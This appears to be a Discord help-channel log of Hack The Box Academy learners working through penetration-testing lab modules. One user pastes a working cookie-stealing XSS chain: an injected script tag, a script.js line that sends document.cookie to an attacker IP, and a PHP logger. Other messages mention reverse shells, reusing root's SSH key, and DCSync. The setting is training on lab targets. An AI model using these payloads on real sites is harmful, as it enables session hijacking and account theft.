What's up with the web interface on htb?

It looks buggy af

how do I stop the memory map view from moving?

it just sorts itself. making it impossible to select

hi guys sorry to disturb, i recently got hacked by a trojan virus on my computer that completely emptied my phantom wallet. I need some experienced guys to help me understand who did this to me. I really just want to expose them, to help any other victim that these guys will target. They operate on a website in which they made you download a trojan virus. I was able to disassemble with ghidra, and i need someone to help me decrypt those files. Thank you so much in advance, i really hope someone will help me.

https://academy.hackthebox.com/module/205/section/2351 can anyone give a nudge on whitebox attacks type juggling authentication bypass

So my question is:
"Try to use what you learned in this section to fuzz the '/blog' directory and find all pages. One of them should contain a flag. What is the flag? "

My issue is, i've followed the steps but it doesn't output me what the found website is.
Firstly it displays ".phps" with a status code of "403".

I've ran the word directory list after with the /blog/FUZZ.phps to see a webpage but im not sure if i've done it correctly.

ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://83.136.251.109:52734/blog/FUZZ.phps

this image above was to find the file extension after the blog

this is what i ran after to find for webpages but it outputted several webpages

And i assume that was to be invalid and I've done something wrong

include the module and section name, we won't know which specific question otherwise

Alright

Module name is Attacking Web Applications with Ffuf

And the section is

page fuzzing

/blog is a directory

yes I know

Oh wait I understand

ffuf returns lots of false positives use a flag to filter out invalide response size

do i replace BLOG with Fuzz?

it gave me the extension of ".phps"

so it won't be blog.php, it will be a file inside the directory, e.g. /blog/index.php

but how do we know it's index for sure

a directory contains files, it won't have file extensions

it could be another webpage in the future for other things

should be used always?

-fs right

Actually i got a question, when i did the ffuf command earlier, how come we got a ".phps"

personally i found that a little odd to myself

yes, i usually run it the first time to figure out the size of the content i want to screen out then run it again with the flag

that's the common one, you can try other file names and check the response

a response of 200 means the page exists

yeah I know

Actually look, my command states using the web-extension file to display what extensions exists but only phps outputted, there wasnt any i found to be fair

is it possible to bypass this, pw_hash gives sha256

try -e .php

because you aren't fuzzing the right place, again the directory will not contain the extension

got it

first try the extensions, if there's one that returns 200, you can use that to continue to fuzz the page

yeah ofc, im just trying my best to look for the correct extension

nvm ignore that

stuck for ever, i cant find a way to bypass it

what are u trying to do

bypass login without a password

well,,,, I don't think you can unless you SQLI or able to run code backend usually tries to prevent it

this is from type juggling section

Oh not sure myself then apologies

I havent went to that topic im not really a programmer, I can read code but cant write it

its either that or this we have to exploit one

it says allow access to "all" our admin user, never mention anything about the convention of names

you should include the module and section name and where you're stuck at so that people can help you, instead of just posting screenshots without any context

i did here

i think i have to bypass the login somehow with username containing admin but i cant find which admin user has password that hash numeric hash

In the Pennyworth module…. Very easy, getting started. I was curious as to why it is that nothing happens when I start the netcat listener and have everything matched up to execute /bin/bash/ in the Giddy reverse shell script code.. whoami yields nothing. I’ve tried several different ports. It acts like I’ve just done nothing at all. No confirmation of connection or anything.

Hello! I am trying to solve 2nd part of challenge in Privilege Escalation. I can see I am working as user2 and I can see flag.txt is in root/flag.txt, but I don't have permissions. There are no commands I can run as user2 as root. However, I can see I have access to id_rsa under /root/.ssh/ on remote. I am hard time moving onwards from here.

have u tried changing into the directory>?

using "cd"

also linux fundamentals you need to use the mousepad command with the filepath to open it

wait ur tryuing to open the flag.txt right, oh wait this windows

try the notepad command in the windows console to try open it

Are you replying to my message? 😄

ye

It is linux

oh it's linux?

hmm ok try to cd into it

I cannot just cat or vim flag as I have no permission

sudo?

I need to be sudo, but I am not sure how to get that privilege from user2 to sudo...

do u have access to

user1? maybe if thats admin u can change permissions for user2

if you have access to root's ssh directory what can you do?

anything!

hm, I can check that, but I doubt that as first part of challenge was from user1 to get to user2...

,

well I can see the id_rsa

I can copy that id_rsa to my local

I did copy it and replaced my current id_rsa with the one copied from /root/.ssh/id_rsa. Then I tried to ssh to root via ssh root@ip -i id_rsa

but it didn't work

why did it not work

permission denied public key

What can cause this? If I go to the webserver through webbrowser it works fine

it says permission deined

change to a writable folder maybe

like /Users/Public/

Don't know why it shouldn't be writeable, im in the users own dir

temp doesnt work either

make sure you're using the right key, you don't have to overwrite your own key file, just save it to a file, the name doesn't matter as long as you specify it

-o /file.exe writes it to C: root

did you get the answer

Ooof rookie mistake... thanks :D Btw. since LaZagne runs in a new window, would it be possible to run it through CLI only?

how did you run it

./Lazagne.exe should run it in same terminal

hmm I am still getting the same error message

Nice, was because I was using cmd. PS works

are you using the right port?

I just tried to pass port and I am getting different message with unprotected key

got it

I forgot to chmod the file with key inside

Thanks for guidance

it seems like so many people had stuck with this and there is no answer in discord history :( and forum

OH nvm found it wow

for future people: check every function and every value in loose comparision

Heyy

We need Splunk model 🥹

https://academy.hackthebox.com/module/details/218
https://academy.hackthebox.com/module/details/233

can somebody help me with the module INTRODUCTION TO WINDOWS EVASION TECHNIQUES / Static Analysis?
i try to get the reverse shell as explained, the reverse shell works when i just use a normal .exe created with msfvenom, but when i use the C# code it doesnt work

no mod here who has done the module?

In my case, the revershell was only established for a moment, but it was enough to get the flag

SQLi fundamentals gave me a headache 😵‍💫

I liked it hehe

Last year, I passed EC Council’s little course on SQLi. So I was not expecting the ass kicking HTB gave me lol

but you got the messgae from the handler that the session was opend?

Yep

i dont...

can i send you the C# code in private for a quick review?

Sure

thanks

that good to hear that it was more challanging for you. When I got into it I didn't have that much exposure to the subject but was really interested in any injection type attacks like that.

Don’t get me wrong, I think it’s really cool. And it took me thinking about it like “terminal commands with extra steps” for it to really click. But yeah. It was much more challenging than my previous exposure to it.

HTB education so obvi top-tier.

I like the whole trying to guess what it looks like on the other end of the input.

HTB is an excellent service to have for such a nice price too. I get really excited when I get to come home to learn.

Hey what’s up 👋

All good how about youu

Having said this, auth bypass has always been ez pz for me. But db enumeration on a webpage really tripped me up. I’m much more comfortable in a command line environment, but that just means that’s the area I need to focus on strengthening.

I’m addicted to HTB academy lol I work through modules from like 8am-3pm Monday-Thursday.

ffuf, page fuzzing. Only .phps exists?

and status code is 403 so it wouldn't really work

my input

Shouldn't you check for other file names/folder names too? Here you're just checking for files called index with different extensions

I just realized there's an Assembly Language module, that's so awesome. HTB Academy really is a great resource

I’m new to cybersecurity and I wanted to know were should I start on HTB? Academy labs or CtF

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

^

For some reason when i use HUD mode in ZAP and open my browser i try to put the domain in scope put the target doesn't change neither the text

Yes same here I can forget to eat sometimes.

Yeah it's easy to lose track of time when you're engrossed in a module

I actually did that today! Haha. Found a bag of Chex mix though lol

it feels good to be that focus lol

Yeah, I especially enjoy it as it gives my ADHD hyperfocus something to latch onto lol

Stuck at broken authentication skill assessment any one can help🫤

I get username name and password

But i stuck at 2FA otp

I'm guessing you've tried bruteforcing OTP with no results right? So go back through your notes from the module and try other ways other than bruteforcing OTP. Register a new account and see what a normal login request looks like and go from there

Did you chain this by editing the Ubuntu proxychains conf file?

https://academy.hackthebox.com/module/103/section/1008
URL being used

http://10.129.113.130/hijacking/?fullname=test&username=testtest&password=test&email=test%40test.com&imgurl=%22%3E%3Cscript+src%3Dhttp%3A%2F%2F10.10.15.121%3A8080%2Fscript.js%3E%3C%2Fscript%3E

script.js

cat script.js
 
new Image().src='http://10.10.15.221/index.php?c='+document.cookie

index.php

cat index.php

<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

Php server command and logs

sudo php -S 0.0.0.0:8080
[Thu Jun 13 01:42:18 2024] PHP 7.4.33 Development Server (http://0.0.0.0:8080) started
[Thu Jun 13 01:43:37 2024] 103.56.61.130:55874 Accepted
[Thu Jun 13 01:43:37 2024] 103.56.61.130:55874 Invalid request (Malformed HTTP request)
[Thu Jun 13 01:43:37 2024] 103.56.61.130:55874 Closing
[Thu Jun 13 01:50:12 2024] 87.121.69.27:40472 Accepted
[Thu Jun 13 01:50:12 2024] 87.121.69.27:40472 [200]: CONNECT google.com:443
[Thu Jun 13 01:50:12 2024] 87.121.69.27:40472 Closing

Any idea what I am missing, don't seem to be receiving any relevant requests in php server logs even after I run the URL

your script isn't calling your ip:8080

also i suggest, if you're using pwnbox, to specify your tun0 ip -- as the other Interface is public facing

hence why you're getting those rando public IPs connecting

What are you talking about?

Can anyone help me with SPN jacking on DACL II? the impacket-getST command isn't working, it fails due to authentication errors. I feel like the hash is wrong. Am I just doing something wrong? This is the "Abusing Live SPN Jacking from LInux" section. Had no issues doing it in Windows.

Can someone nudge me on Attacking Domain Trusts - Child -> Parent Trusts - from Linux

I am trying to find the hash from this question
Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer.

I was able to get the reverse shell through psexec.py and have searched everywhere in the shell but I can't find anything that can help me get the hash. I did find bross "||" 1179: INLANEFREIGHT\bross (SidTypeUser)"||" but not sure where to go from there.

returning to HTB after a break so please bear with me haha

what's the exact error

Let me fire the module up and get it

did you psexec to the right domain's DC?

||"172.16.5.5||"

I don't remember the IP, your target is the INLANEFREIGHT.LOCAL domain

did you do it manually ur used raisechild.py

Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)

yeah that means whatever credentials you gave it is wrong

did you complete this section?

yeah, you can dm but I don't have notes for that question

can anyone help me with bloodhound. I don't get why but for some reason the zip file from the SharpHound is not getting uploaded to my bloodhound. Neo4j is running fine. It's always getting stuck in the same way as shown in the screenshot. I'm facing this problem from long time. I was only able to successfully upload the files 2-3 times in last 4 months. Can anyone help me with what I should do?

https://i.imgur.com/JjzIUt5.png

The Footprinting module is the only module that covers external stuff in the Penetration Tester Path, yeah?

your sharphound version is not compatible with the old bh you're using, when you run sharphound it will tell you the minimum version required

use v2.0

all the web stuff are also external

@next bronze the other day I was on the pivoting module and you recommended learning ligolo-ng to me. Is there a resource you'd recommend or should I just reference their GitHub?

Got it. By web stuff, I assume you're referring to the section that comes after Active Directory Enumeration & Attacks?

https://www.arth0s.tech/posts/ligolo-ng/
there's also a 20 min video on youtube but I can't remember who its from

yeah web attacks is a big vector to get initial foothold

Thanks. Btw would you recommend I do any of the pro-labs prior to the CPTS exam? Or just doing a blind AEN is sufficient?

For some background on me, I've never done a full-blown pentest.

many people who passed the exam have not either, you'll be fine

I'm using bloodhound 2.4 and also do you think if the version of sharphound is old that can cause an issue?

I wrote a blogpost about it that covers these and more
https://xre0us.io/posts/cpts-oscp-and-you/

your version of sharphound is too new for your bh

I'm afraid that the latest version of bloodhound that's available.

Do a report for AEN, use the CPTS template. At least that way you know what a mess you are getting yourself into.

Got it. Am I allowed to share the report in #cpts for peer-review?

documentation is the hardest part of the path imo

I haven't even gotten there, and I just know you're right 😂

yes so use an older version of sharphound, or use bh community edition

pretty sure older versions of bh won't support certain permissions etc, so you may miss some attack vector(s) using old stuff

You can ask, someone will probably agree to review it.

Noted. Thanks.

Just don't post it there, ask for a review and dm it.

Ah ok, got it.

Thanks for clarifying.

You mentioned that you spent a month after you completed the path to do boxes and the pro labs (Dante and Zephyr). How long would you say just the pro-labs took?

couple of days for dante, about a week for zephyr

if I remember right, it's been a while

hey guys do you know if you can filter based on response in zaproxy?

That's a really detailed blog. Very informative.

For Active Directory Enumeration & Attacks -> Privileged Access
If you can't connect with SSH to 172.16.5.150 through the Windows host cf
#modules message
#modules message
It turns out that, on my end, the host with the SSH server (172.16.5.150/ACADEMY-EA-DB01) can't access my clipboard if I ssh with powershell through the RDP session (ACADEMY-EA-MS01).
So trying to copy paste the htb-student password doesn't work.
But manually typing its password does

my bad yeah i did that, i did it manually

you can use the system shell to dump the NTDS or use the ticket to DCSync